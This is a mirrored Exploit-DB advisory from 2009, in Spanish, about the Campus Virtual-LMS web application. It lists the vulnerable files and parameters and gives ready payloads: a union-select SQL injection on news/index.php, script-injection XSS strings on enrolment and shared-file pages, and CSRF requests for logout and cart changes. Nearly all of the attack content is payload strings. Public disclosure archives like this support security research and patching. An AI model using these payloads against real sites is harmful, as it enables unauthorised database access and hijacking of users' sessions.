bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8937.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

51 lines
No EOL
2.1 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

+-----------------------------------------------------------------------------+
LMS: Campus Virtual-LMS
WEB: http://campusvirtualcomputrade.cae.net
Autor: Yasión
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] SQLi
-----------------------------------------------------------------------------+
Archivo: news/index.php [no logged]
GET: ?id
Inyección: -1 union select 1,2,3,4,5,6,7
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] XSS
-----------------------------------------------------------------------------+
Archivo: enrolments/step1.php [no logged]
GET: ?courseid
Inyección: 1"><script>alert(/xD/.source)</script>
Archivo: files/shared_list.php [logged]
GET/POST: ?search
Inyección: "><script>alert(/xD/.source)</script><!--
Archivo: files/shared_list.php [logged]
GET: ?siteid
Inyección: "><script>alert(/xD/.source)</script><!--
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] CSRF
-----------------------------------------------------------------------------+
Archivo: login/logout.php
Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
link...
Archivo: enrolments/step2.php
GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
cesta identificada por ODERID. Sería necesario conocer por adelantado la
cesta del usuario. (No explotable)
-----------------------------------------------------------------------------+
+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+
# milw0rm.com [2009-06-12]
Reference in a new issue View git blame Copy permalink